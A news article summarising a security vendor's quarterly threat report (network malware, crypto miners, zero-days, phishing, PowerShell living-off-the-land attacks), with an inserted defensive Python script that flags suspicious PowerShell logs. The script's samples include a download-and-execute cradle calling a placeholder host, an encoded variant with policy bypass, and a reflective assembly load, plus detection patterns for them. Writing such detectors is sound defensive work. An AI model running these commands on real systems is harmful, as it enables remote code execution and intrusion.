
94% increase in network malware

Other key findings show an increase in crypto miner detections, a spike in zero-day malware, a drop in endpoint malware, a rise in Linux-based threats, and more.

Saturday, 12th April 2025, by Phil Alsop

WatchGuard Technologies has released the findings of its latest Internet Security Report, a quarterly analysis detailing the top malware, network, and endpoint security threats observed by the WatchGuard Threat Lab researchers during the fourth quarter of 2024.

The report’s key findings include a 94% quarter-over-quarter increase in network-based malware detections, reflecting a steady rise in threats. At the same time, the data shows an increase across all malware detections, including a 6% increase in Gateway AntiVirus (GAV) detections and a 74% increase in Advanced Persistent Threat (APT) Blocker detections. The most significant rise, 315%, came from the proactive machine-learning detection offered by IntelligentAV (IAV), indicating the growing role of proactive anti-malware services in catching sophisticated, evasive malware, such as zero-day malware, when it arrives over encrypted channels. The significant upticks in evasive hits suggest attackers are leaning harder into obfuscation and encryption, challenging traditional defences.

The Threat Lab also observed a significant increase in crypto miner detections, up 141% quarter over quarter. Cryptocurrency mining is a normal, legitimate process for acquiring cryptocurrency on some blockchains, including Bitcoin. A malicious coin miner, by contrast, is software that installs a miner on a machine without the user’s knowledge or consent. As the price and popularity of Bitcoin go up, crypto miner detections also stand out as a malicious tactic used by threat actors.

“The findings from our Q4 2024 Internet Security Report reveal a cybersecurity landscape where attackers are both continuously relying on old habits and low-hanging fruit vulnerabilities and flaws that are easy to exploit while also leveraging evasive malware techniques to evade traditional defences,” said Corey Nachreiner, chief security officer at WatchGuard Technologies. “The data illustrates the importance of staying vigilant with the basics: proactively keep systems updated, monitor for abnormal activity, and use layered defences to catch the inevitable exploit attempts across networks and endpoints. By doing so, businesses can greatly mitigate the threats demonstrated this quarter and be prepared for what adversaries and the evolving threat landscape may bring.”

Additional key findings from WatchGuard’s Q4 2024 Internet Security Report include:

In Q4, Zero-Day malware rebounded to 53%, up significantly from its all-time low of 20% in Q3. This reinforces the report’s earlier observation that malware increasingly comes in encrypted connections, with these encrypted channels typically delivering more sophisticated and evasive threats.

Total unique malware threats were significantly down for the quarter, a historic 91% decrease. This is likely due to a reduction in one-off targeted attacks and an increase in generic malware. However, fewer unique threats does not mean that those which attempt to slip through defences will be simple attacks; they still need to be addressed quickly and diligently.

Network attacks declined 27% from the previous quarter. The Threat Lab findings show that many tried-and-true exploits persisted as top attacks this quarter, underscoring that attackers stick with what they know works.

The top phishing domains list remained unchanged from the previous quarter, highlighting the continued use of persistent and high-impact phishing infrastructure. The SharePoint-themed phishing domains, which often mimic legitimate login portals to harvest credentials, suggest that attackers still exploit business email compromise (BEC) tactics to target organisations relying on Office 365 services.

Living-off-the-land (LotL) attacks, which abuse legitimate system tools such as PowerShell, Windows Management Instrumentation (WMI), or Office macros instead of relying on external malware, are trending. This can be seen in the 61% of endpoint attack techniques that leveraged PowerShell injection and scripts, which accounted for nearly 83% of all endpoint attack vectors. Of that ~83%, 97% were PowerShell, again pointing to PowerShell being responsible for the vast majority of threat actors’ avenues of attack.
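The LotL finding above is the kind of activity that endpoint script logging can surface. As an added illustration, not code from the report or from WatchGuard's products, here is a small Python triage script that scans constructed PowerShell script-block log entries (modelled on the text of Windows Event ID 4104 events) for commonly abused patterns: encoded commands, download cradles, execution-policy bypass, hidden windows and in-memory assembly loading. The sample events, hosts, URLs, rule names and weights are all invented for this example; the only real-world detail relied on is that PowerShell's -EncodedCommand takes base64 of UTF-16LE text, so the script decodes that blob and scans the decoded content too.

```python
import base64
import re

# Constructed sample script-block log entries (not real telemetry).
# "script" mimics the ScriptBlockText field of a PowerShell 4104 event.


def encode_command(cmd: str) -> str:
    """Encode a command the way -EncodedCommand expects: base64 over UTF-16LE."""
    return base64.b64encode(cmd.encode("utf-16le")).decode("ascii")


SAMPLE_EVENTS = [
    {"id": 1, "host": "ws01", "script": "Get-ChildItem C:\\Users\\alice\\Documents | Measure-Object"},
    {"id": 2, "host": "ws02", "script": "powershell.exe -NoP -W Hidden -ExecutionPolicy Bypass -EncodedCommand "
     + encode_command("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')")},
    {"id": 3, "host": "ws03", "script": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/payload.ps1')"},
    {"id": 4, "host": "srv01", "script": "$bytes = [IO.File]::ReadAllBytes('C:\\temp\\stage.bin'); [System.Reflection.Assembly]::Load($bytes)"},
    {"id": 5, "host": "ws04", "script": "Get-Service | Where-Object Status -eq 'Running'"},
]

# Hypothetical detection rules: (name, pattern, weight). Weights are illustrative.
RULES = [
    ("encoded_command", re.compile(r"-(?:e|ec|enc|encodedcommand)\b", re.I), 2),
    ("download_cradle", re.compile(r"Net\.WebClient|Invoke-WebRequest|DownloadString|DownloadFile", re.I), 3),
    ("invoke_expression", re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I), 2),
    ("policy_bypass", re.compile(r"-ExecutionPolicy\s+Bypass", re.I), 2),
    ("hidden_window", re.compile(r"-W(?:indowStyle)?\s+Hidden", re.I), 1),
    ("reflective_load", re.compile(r"Reflection\.Assembly\]::Load|VirtualAlloc|WriteProcessMemory|CreateRemoteThread", re.I), 4),
]

ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(script: str):
    """Return (decoded_text or None, script with the base64 blob masked).

    Masking the blob keeps base64 letters from accidentally matching keyword rules;
    the decoded text is scanned separately by analyze_event.
    """
    m = ENCODED_RE.search(script)
    if not m:
        return None, script
    blob = m.group(1)
    try:
        decoded = base64.b64decode(blob, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None, script  # malformed blob: scan the raw line only
    return decoded, script.replace(blob, "<base64-blob>")


def analyze_event(event: dict) -> dict:
    """Score one event: sum rule weights for every rule that matches the visible or decoded text."""
    decoded, visible = decode_encoded_command(event["script"])
    scan_text = visible if decoded is None else visible + "\n" + decoded
    score, reasons = 0, []
    for name, pattern, weight in RULES:
        if pattern.search(scan_text):
            score += weight
            reasons.append(name)
    return {"id": event["id"], "host": event["host"], "score": score,
            "reasons": reasons, "decoded": decoded}


def triage(events, threshold: int = 3):
    """Return analysed events at or above the threshold, highest score first."""
    results = [analyze_event(e) for e in events]
    flagged = [r for r in results if r["score"] >= threshold]
    return sorted(flagged, key=lambda r: r["score"], reverse=True)


if __name__ == "__main__":
    for r in triage(SAMPLE_EVENTS):
        print(f"event {r['id']} on {r['host']}: score={r['score']} reasons={r['reasons']}")
        if r["decoded"]:
            print("  decoded:", r["decoded"])
```

Two design points matter in practice. First, the encoded blob is masked before keyword matching and its decoded form is scanned instead, so an operator who hides a download cradle behind -EncodedCommand still trips the cradle rule; a rule set that only inspects the raw command line misses exactly the evasive cases the report describes. Second, plain administrative commands such as `-eq` or `Where-Object` must not fire the encoded-command rule, which is why that pattern requires a word boundary after the flag; false positives on benign PowerShell are the main reason such detections get switched off.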

Over half of the top 10 network detections are generic signatures, which catch common web application flaws. This trend underscores that attackers are going after “bread and butter” style attacks en masse.

Consistent with WatchGuard’s Unified Security Platform® approach and the WatchGuard Threat Lab’s previous quarterly research updates, the data analysed in this quarterly report is based on anonymised, aggregated threat intelligence from active WatchGuard network and endpoint products whose owners have opted to share in direct support of WatchGuard’s research efforts.
